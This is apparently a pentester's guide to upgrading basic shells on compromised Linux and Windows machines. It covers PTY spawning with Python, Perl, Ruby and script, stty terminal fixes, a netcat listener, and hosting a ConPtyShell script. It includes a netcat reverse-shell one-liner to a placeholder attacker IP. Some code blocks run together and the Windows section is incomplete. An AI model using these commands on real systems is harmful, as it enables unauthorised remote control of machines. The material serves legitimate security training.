Upgrading an Autocomplete TTY Shell on Linux and Windows: A Guide for Pentesters
Upgrading an Autocomplete TTY Shell on Linux and Windows: A Guide for Pentesters
Introduction
When working with command-line interfaces on compromised machines, it is common to be limited to basic TTY shells that lack essential features like autocomplete and history. Upgrading these shells can significantly improve usability and efficiency during post-exploitation. This guide covers methods to upgrade TTY shells on both Linux and Windows targets to provide functionalities such as command history and tab completion, making them easier to work with.
Verify Installed Language(s)
Before attempting to upgrade or interact with shells, it’s important to verify which interpreters and shells are available on the target system. This helps determine the best approach to proceed. Here’s how to check which interpreters or shells are installed:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Check if Python is installed and its location
which python # Output will show the path if Python 2.x is installed
# Check for Python 3 installation
which python3 # Output will show the path if Python 3.x is installed
# Verify if Bash is available
which bash # Output will show the path if Bash is installed
# Check for PowerShell on a Linux machine (if applicable)
which pwsh # This shows if PowerShell Core is available on Linux
# For Windows, check in Command Prompt or PowerShell for presence
where python # Equivalent to 'which' in Windows
where python3
where bash
Examples
Below are commands to help upgrade the basic TTY shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Use Python 3 to spawn an upgraded shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Use Python 2 to spawn an upgraded shell
python -c 'import pty; pty.spawn("/bin/bash")'
# Alternative approach with os.system
echo os.system('/bin/bash')
# Spawn an interactive shell with /bin/sh
/bin/sh -i
# Use Perl to execute a shell
perl -e 'exec "/bin/sh";'
# Use Ruby to execute a shell
ruby -e 'exec "/bin/sh"'
If Python Isn’t Installed, Use:
1
2
3
# Use the script command to spawn an upgraded shell
script /dev/null -c bash
/usr/bin/script -qc /bin/bash /dev/null
Reverse Shell Example
1
2
# Simple reverse shell using Netcat
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.xxx.xxx 9001 >/tmp/f
Steps to Get an Autocomplete Shell
After choosing one of the methods above to upgrade your TTY shell, suspend it using:
1
ctrl-z
On the attacker’s machine, run:
1 2
stty raw -echo stty -a # Verify current terminal settings
Bring the shell to the foreground:
1 2
fg stty raw -echo; fg
On the victim’s machine, configure the shell:
1 2
stty rows $x columns $y # Set remote shell to x number of rows & y columns export TERM=xterm-256color # Allows you to clear console and have color output
Press
Entertwice to reactivate the session.
Now you should have a shell with autocomplete, history, and better usability features.
To have autocomplete on a Windows machine, you can also use:
A simple guide how you could use it:
To upgrade to an advanced shell on a Windows target using PowerShell, you can leverage the ConPtyShell method. Below is an example workflow for hosting and running the script:
On Kali Linux (Attacker’s Machine)
1
2
3
4
5
6
# Host the PowerShell script
python3 -m http.server 80
# to host Invoke-ConPtyShell.ps1
# In another terminal on Kali
stty raw -echo; (stty size; cat) | nc -lvnp 9001
To have autocomplete on a Linux machine, you can also use:
1
2
3
4
# Clone the repo, go to the directory and use the command:
./penelope.py 5555 -i eth0
# For more guidance, go to the repo.
Conclusion
Upgrading to a TTY shell with autocomplete makes working on target systems much easier for pentesters. It helps you type commands faster, find past commands quickly, and move around more efficiently. This saves time and reduces mistakes, making the job smoother and simpler. Whether you’re working on Linux or Windows, having an upgraded shell makes interacting with the system more comfortable and productive.